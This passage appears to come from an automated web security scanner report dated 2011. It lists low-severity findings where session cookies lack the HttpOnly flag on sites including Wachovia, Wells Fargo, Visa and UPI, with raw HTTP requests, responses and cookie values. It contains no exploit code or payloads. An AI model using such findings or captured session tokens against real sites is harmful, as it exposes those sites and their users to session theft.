User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:31 GMT
Server: IBM_HTTP_Server
Set-Cookie: JSESSIONID=0000QTy7kEmBMIWQOU_kw9iWUqa:11ele8d69; Path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 23735

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>TransUnion - Check Your
...[SNIP]...

11.174. http://www.upi.com/Science_News/2011/01/07/Blue-fin-tuna-sells-for-400000-in-Tokyo/UPI-23331294451264/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.upi.com
Path:   /Science_News/2011/01/07/Blue-fin-tuna-sells-for-400000-in-Tokyo/UPI-23331294451264/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Science_News/2011/01/07/Blue-fin-tuna-sells-for-400000-in-Tokyo/UPI-23331294451264/ HTTP/1.1
Host: www.upi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:17:32 GMT
Server: Apache/2.2.15 (Unix) PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=h5pmndrdvp301roj3gb031t642; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 66058

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>Blue fin tuna
...[SNIP]...

11.175. http://www.viglink.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.viglink.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.viglink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Language: en
Content-Type: text/html;charset=UTF-8
Date: Wed, 02 Feb 2011 23:45:27 GMT
Expires: -1
Pragma: no-cache
Set-Cookie: vglnk.Agent.p=38d8b11a817b037b4b6a4f8ea1982e0a; Domain=.viglink.com; Expires=Sat, 30-Jan-2021 23:45:27 GMT; Path=/
Set-Cookie: JSESSIONID=850E1DB3E66B214055AFE3AAEB898474; Path=/
Vary: Accept-Encoding
Connection: Close
Content-Length: 14626

<!doctype html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head>
<title>Affiliate Every Link on the Web with VigLink</title>

<meta http-equiv="Content-type" content="text/h
...[SNIP]...

11.176. http://www.visa.com/globalgateway/main.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.visa.com
Path:   /globalgateway/main.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /globalgateway/main.jsp HTTP/1.1
Host: www.visa.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Content-Type: text/html
Content-Language: en-US
Location: http://usa.visa.com?country=us&ep=v_gg_new&akamai=true
Server: Microsoft-IIS/7.0
Server: WebSphere Application Server/6.1
Expires: Wed, 02 Feb 2011 21:58:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 02 Feb 2011 21:58:59 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=0000UOlAioWfWNhvQEqbi_U_t5G:13l7m5muh; Path=/
Set-Cookie: v_history=us; Expires=Thu, 02 Feb 2012 21:58:58 GMT; Path=/; Domain=www.visa.com


11.177. https://www.wachovia.com/checking  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.wachovia.com
Path:   /checking

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checking HTTP/1.1
Host: www.wachovia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B; originalReferrer=; TLTSID=CB01F7F42F17102FA757AB53C440707C;

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 22:28:56 GMT
Server: IBM_HTTP_Server
Location: https://www.wachovia.com/stateselector?referring_page=https%3A%2F%2Fwww.wachovia.com%2Ffoundation%2Fv%2Findex.jsp%3Fvgnextoid%3D98fd9e05d1674210VgnVCM200000627d6fa2RCRD&product_code=CHK
Content-Length: 0
Set-Cookie: JSESSIONID=0000dvt1ZzKJXrWc9gbCNqMGP7l:13k56putc; Path=/; Secure
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Keep-Alive: timeout=10, max=111
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en-US


11.178. https://www.wachovia.com/enroll  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.wachovia.com
Path:   /enroll

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /enroll HTTP/1.1
Host: www.wachovia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B; originalReferrer=; TLTSID=CB01F7F42F17102FA757AB53C440707C;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:28:56 GMT
Server: IBM_HTTP_Server
Content-Length: 10499
Set-Cookie: JSESSIONID=0000uHSgrTGJxYGnI6iR9pKpTgM:13k56jdtl; Path=/; Secure
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Keep-Alive: timeout=10, max=180
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en-US


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...

11.179. https://www.wachovia.com/espanol  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.wachovia.com
Path:   /espanol

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /espanol HTTP/1.1
Host: www.wachovia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B; originalReferrer=; TLTSID=CB01F7F42F17102FA757AB53C440707C;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:28:56 GMT
Server: IBM_HTTP_Server
Content-Length: 17128
Set-Cookie: JSESSIONID=0000lFJ1F5-GK6__wMshMwIv4Cz:13k56ps4a; Path=/; Secure
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Keep-Alive: timeout=10, max=188
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...

11.180. https://www.wachovia.com/foundation/v/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.wachovia.com
Path:   /foundation/v/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /foundation/v/index.jsp HTTP/1.1
Host: www.wachovia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B; originalReferrer=; TLTSID=CB01F7F42F17102FA757AB53C440707C;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 22:28:53 GMT
Server: IBM_HTTP_Server
$WSEP:
Set-Cookie: wcp_hawk_accepted=true; Path=/; Secure
Set-Cookie: JSESSIONID=0000AlN9_xVDmP9QYaasX1jvJDV:13k56putc; Path=/; Secure
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Keep-Alive: timeout=10, max=38
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 31

Error 404: Error reported: 404

11.181. https://www.wachovia.com/helpcenter  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.wachovia.com
Path:   /helpcenter

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /helpcenter HTTP/1.1
Host: www.wachovia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B; originalReferrer=; TLTSID=CB01F7F42F17102FA757AB53C440707C;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:29:00 GMT
Server: IBM_HTTP_Server
Content-Length: 15556
Set-Cookie: JSESSIONID=0000rhlS1N-pE73MIep9_A-cQnt:13k56ps4a; Path=/; Secure
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Keep-Alive: timeout=10, max=114
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...

11.182. https://www.wachovia.com/home-equity  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.wachovia.com
Path:   /home-equity

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /home-equity HTTP/1.1
Host: www.wachovia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B; originalReferrer=; TLTSID=CB01F7F42F17102FA757AB53C440707C;

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 22:28:56 GMT
Server: IBM_HTTP_Server
Location: https://www.wachovia.com/stateselector?referring_page=https%3A%2F%2Fwww.wachovia.com%2Ffoundation%2Fv%2Findex.jsp%3Fvgnextoid%3D26a45ef43a0aa110VgnVCM1000004b0d1872RCRD&product_code=HE
Content-Length: 0
Set-Cookie: JSESSIONID=0000dP3oixQ1DbYG5TxmBbYGraK:13k56ps4a; Path=/; Secure
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Keep-Alive: timeout=10, max=172
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en-US


11.183. https://www.wachovia.com/inside  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.wachovia.com
Path:   /inside

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inside HTTP/1.1
Host: www.wachovia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B; originalReferrer=; TLTSID=CB01F7F42F17102FA757AB53C440707C;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:29:03 GMT
Server: IBM_HTTP_Server
Content-Length: 11387
Set-Cookie: JSESSIONID=0000lB3HjzKcM94L-03CyTFTNHU:12odtgdjf; Path=/; Secure
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Keep-Alive: timeout=10, max=92
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...

11.184. https://www.wachovia.com/legal  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.wachovia.com
Path:   /legal

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /legal HTTP/1.1
Host: www.wachovia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B; originalReferrer=; TLTSID=CB01F7F42F17102FA757AB53C440707C;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:29:03 GMT
Server: IBM_HTTP_Server
Content-Length: 16538
Set-Cookie: JSESSIONID=0000CxesXLPPZ7a6G9CPZsjjQFk:13k56ptt5; Path=/; Secure
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Keep-Alive: timeout=10, max=111
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en-US


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
...[SNIP]...

11.185. https://www.wachovia.com/privacyandsecurity  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.wachovia.com
Path:   /privacyandsecurity

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /privacyandsecurity HTTP/1.1
Host: www.wachovia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B; originalReferrer=; TLTSID=CB01F7F42F17102FA757AB53C440707C;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:29:00 GMT
Server: IBM_HTTP_Server
Content-Length: 15674
Set-Cookie: JSESSIONID=0000WPP3qR1UXcKvgBv_tJIUXUB:13k56jbt7; Path=/; Secure
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Keep-Alive: timeout=10, max=126
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en-US


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
...[SNIP]...

11.186. https://www.wachovia.com/retirementlogin  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.wachovia.com
Path:   /retirementlogin

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /retirementlogin HTTP/1.1
Host: www.wachovia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B; originalReferrer=; TLTSID=CB01F7F42F17102FA757AB53C440707C;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:29:00 GMT
Server: IBM_HTTP_Server
Content-Length: 5780
Set-Cookie: JSESSIONID=0000VJINNfShL2dwHbauHrDBQXd:13k56jf38; Path=/; Secure
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Keep-Alive: timeout=10, max=200
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en-US


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
...[SNIP]...

11.187. https://www.wachovia.com/savings  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.wachovia.com
Path:   /savings

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /savings HTTP/1.1
Host: www.wachovia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B; originalReferrer=; TLTSID=CB01F7F42F17102FA757AB53C440707C;

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 22:28:56 GMT
Server: IBM_HTTP_Server
Location: https://www.wachovia.com/stateselector?referring_page=https%3A%2F%2Fwww.wachovia.com%2Ffoundation%2Fv%2Findex.jsp%3Fvgnextoid%3D2ca09e05d1674210VgnVCM200000627d6fa2RCRD&product_code=SAV
Content-Length: 0
Set-Cookie: JSESSIONID=0000fhrSMq2j_R8sve1lLNdM7Xm:12odtgc43; Path=/; Secure
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Keep-Alive: timeout=10, max=189
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en-US


11.188. https://www.wachovia.com/savings/featured-cd.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.wachovia.com
Path:   /savings/featured-cd.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /savings/featured-cd.html HTTP/1.1
Host: www.wachovia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B; originalReferrer=; TLTSID=CB01F7F42F17102FA757AB53C440707C;

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 22:29:00 GMT
Server: IBM_HTTP_Server
Location: https://www.wachovia.com/stateselector?referring_page=https%3A%2F%2Fwww.wachovia.com%2Ffoundation%2Fv%2Findex.jsp%3Fvgnextoid%3D32519e05d1674210VgnVCM200000627d6fa2RCRD&product_code=SAV
Content-Length: 0
Set-Cookie: JSESSIONID=00008BQ8pR8SO50QDfW-B7reGbU:13k56jdtl; Path=/; Secure
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Keep-Alive: timeout=10, max=195
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en-US


11.189. https://www.wachovia.com/securityplus  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.wachovia.com
Path:   /securityplus

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /securityplus HTTP/1.1
Host: www.wachovia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B; originalReferrer=; TLTSID=CB01F7F42F17102FA757AB53C440707C;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:28:57 GMT
Server: IBM_HTTP_Server
Content-Length: 10317
Set-Cookie: JSESSIONID=0000B7TzXuKu958ZHKv8Vg1MNKf:13k56ps4a; Path=/; Secure
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Keep-Alive: timeout=10, max=188
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...

11.190. http://www.webveteran.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.webveteran.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.webveteran.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 23:45:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=8283151;expires=Fri, 25-Jan-2041 23:45:08 GMT;path=/
Set-Cookie: CFTOKEN=bf0ce741d922432b-17A7490E-5056-A306-AF9E960E65180C8B;expires=Fri, 25-Jan-2041 23:45:08 GMT;path=/
Set-Cookie: SKIP=1;expires=Wed, 09-Feb-2011 23:45:08 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="e
...[SNIP]...

11.191. https://www.wellsfargo.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.wellsfargo.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
